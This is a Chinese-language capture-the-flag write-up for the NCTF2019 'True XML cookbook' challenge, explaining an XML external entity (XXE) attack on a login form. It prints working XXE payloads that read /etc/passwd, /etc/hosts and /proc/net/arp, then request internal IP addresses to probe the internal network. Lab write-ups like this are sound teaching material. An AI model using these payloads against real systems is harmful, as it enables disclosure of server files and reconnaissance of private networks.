[NCTF2019]True XML cookbook Writeup

2023-11-26 19:37:22

结合本题简要讲解一下xxe攻击

本篇文章默认读者了解Xml基本格式
[NCTF2019]True XML cookbook Writeup
首先我们看到一个登录界面,使用burp抓包看一下:
[NCTF2019]True XML cookbook Writeup
这里暴露出来很明显的xxe注入点。

我们开始构造payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/passwd"> 
]>
<user><username>&a;</username><password>a</password></user>

可以看到回显:
[NCTF2019]True XML cookbook Writeup
说明存在xxe注入

这里很关键的一个点在于考察,xxe其实可以用来打内网。

我们读取关键文件:/etc/hosts 和 /proc/net/arp

payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/hosts"> 
]>
<user><username>&a;</username><password>a</password></user>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///proc/net/arp"> 
]>
<user><username>&a;</username><password>a</password></user>

回显分别是:
[NCTF2019]True XML cookbook Writeup

[NCTF2019]True XML cookbook Writeup
给了一个主机IP,读取一下:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.2/"> 
]>
<user><username>&a;</username><password>a</password></user>

[NCTF2019]True XML cookbook Writeup
直接报错,但没关系,我们可以进行C段扫描

扫描结果如下:[NCTF2019]True XML cookbook Writeup

即:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.11/"> 
]>
<user><username>&a;</username><password>a</password></user>

即可

考查知识点:

xxe注入攻击
xxe内网探测

难度

简单

总结:

保持谦虚,继续学习

上一篇:BugkuCTF web17_成绩单 writeup


下一篇:2020羊城杯CTF随缘Writeup